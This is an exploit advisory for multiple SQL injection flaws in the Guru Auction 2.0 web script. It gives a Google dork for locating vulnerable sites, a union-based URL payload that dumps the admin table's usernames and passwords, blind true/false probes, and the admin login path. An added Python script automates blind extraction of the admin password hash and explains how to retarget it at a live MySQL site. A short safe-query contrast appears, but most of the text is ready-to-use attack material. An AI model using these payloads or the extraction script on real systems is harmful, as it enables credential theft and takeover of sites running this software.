Guru Auction 2.0 Multiple SQL Injection Vulnerabilities

Author : v3n0m
Application : Guru Auction 2.0
Price : $49
Vendor : http://www.guruscript.com/
Google Dork : inurl:subcat.php?cate_id=

SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--

Blind SQLi p0c:
~~~~~~~~~~
http://www.political-security.com/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
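The two URLs above are a single true/false oracle: the page renders item 575 only when the injected condition holds. The following is an added example, not part of v3n0m's advisory, that automates that oracle against a constructed stand-in for the vulnerable `detail.php` query. It uses an in-memory SQLite database (so it runs offline) with an invented `items`/`admin` schema and an invented password hash; SQLite's `sqlite_version()` and `substr()` stand in for MySQL's `@@version` and `SUBSTRING()`. It extracts the same `admin.password` column the union PoC targets one character at a time, and shows that the parameterised version of the query gives the oracle nothing to work with.

```python
import sqlite3

# Constructed schema and data for the demo; not Guru Auction's real tables.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE items (item_id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin (user_name TEXT, password TEXT);
        INSERT INTO items VALUES (575, 'Vintage lamp');
        INSERT INTO admin VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return db


def vulnerable_lookup(db, item_id):
    # Same pattern as detail.php?item_id=: the request value is pasted into SQL.
    sql = "SELECT title FROM items WHERE item_id=" + item_id
    return db.execute(sql).fetchone()


def safe_lookup(db, item_id):
    # Hardened form: the value travels as a bound parameter, never as SQL text.
    return db.execute("SELECT title FROM items WHERE item_id=?", (item_id,)).fetchone()


def oracle(db, lookup, condition):
    # True when the item page still renders with "575 AND <condition>" injected,
    # i.e. the condition evaluated true on the server side. SQL errors count as false.
    try:
        return lookup(db, "575 AND " + condition) is not None
    except sqlite3.Error:
        return False


def version_digit_is(db, lookup, digit):
    # Mirrors the advisory's SUBSTRING(@@version,1,1)=5 probe.
    return oracle(db, lookup, "substr(sqlite_version(),1,1)='%s'" % digit)


def extract(db, lookup, expr, charset="0123456789abcdef", max_len=64):
    # Boolean-based extraction: for each position, try every candidate character
    # until the oracle says true; stop at the first position where nothing matches.
    out = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            if oracle(db, lookup, "substr((%s),%d,1)='%s'" % (expr, pos, ch)):
                out += ch
                break
        else:
            break
    return out


def run_demo():
    db = make_db()
    target = "SELECT password FROM admin LIMIT 1"
    return {
        "version_is_3": version_digit_is(db, vulnerable_lookup, "3"),
        "version_is_4": version_digit_is(db, vulnerable_lookup, "4"),
        "hash_via_vulnerable": extract(db, vulnerable_lookup, target),
        "hash_via_safe": extract(db, safe_lookup, target),
    }


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(k, "=", v)
```

Against a real MySQL target the only changes are the HTTP request in `oracle()` (check the response for the item 575 page body) and `SUBSTRING(@@version,1,1)` in place of `substr(sqlite_version(),1,1)`. A comparison per candidate character is slow; a binary search on `ASCII(SUBSTRING(...))` cuts it to about seven requests per character, but the equality form is what the advisory demonstrates.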
Admin login:
~~~~~~~~~~
http://domain.tld/[path]/admin/